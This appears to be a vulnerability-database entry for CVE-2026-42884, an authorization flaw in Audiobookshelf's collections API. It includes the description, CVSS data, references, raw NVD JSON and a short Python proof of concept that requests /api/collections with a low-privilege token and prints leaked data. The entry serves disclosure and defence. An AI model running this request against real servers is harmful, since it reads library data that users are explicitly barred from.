CVE-2026-42884

Description

Audiobookshelf is a self-hosted audiobook and podcast server. Prior to 2.32.2, the GET /api/collections and GET /api/collections/:id endpoints return collections from all libraries without checking whether the requesting user has access to each collection's library. An authenticated user with access to any library can enumerate and read collections (including full book metadata) from libraries they are explicitly restricted from accessing. This vulnerability is fixed in 2.32.2.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Audiobookshelf < 2.32.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def exploit(target_url, token):
    """
    Proof of Concept for CVE-2026-42884
    Demonstrates unauthorized access to collections.
    """
    headers = {
        "Authorization": f"Bearer {token}",
        "User-Agent": "CVE-2026-42884-Scanner"
    }

    # Endpoint that returns collections from all libraries without proper access control
    endpoint = f"{target_url}/api/collections"

    try:
        response = requests.get(endpoint, headers=headers, timeout=10)
        if response.status_code == 200:
            data = response.json()
            print("[+] Vulnerability confirmed!")
            print("[+] Leaked Collections Data:")
            print(data)
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    # Replace with actual target and a valid low-privilege token
    target = "http://localhost:80"
    user_token = "VALID_LOW_PRIVILEGE_TOKEN"
    exploit(target, user_token)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-42884
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-42884
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-42884/
[4] VulDB https://vuldb.com/cve/CVE-2026-42884
[5] https://github.com/advplyr/audiobookshelf/security/advisories/GHSA-rxw2-h55w-ffmh

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-42884", "sourceIdentifier": "[email protected]", "published": "2026-05-11T20:25:44.740", "lastModified": "2026-05-11T20:25:44.740", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Audiobookshelf is a self-hosted audiobook and podcast server. Prior to 2.32.2, the GET /api/collections and GET /api/collections/:id endpoints return collections from all libraries without checking whether the requesting user has access to each collection's library. An authenticated user with access to any library can enumerate and read collections (including full book metadata) from libraries they are explicitly restricted from accessing. This vulnerability is fixed in 2.32.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://github.com/advplyr/audiobookshelf/security/advisories/GHSA-rxw2-h55w-ffmh", "source": "[email protected]"}]}}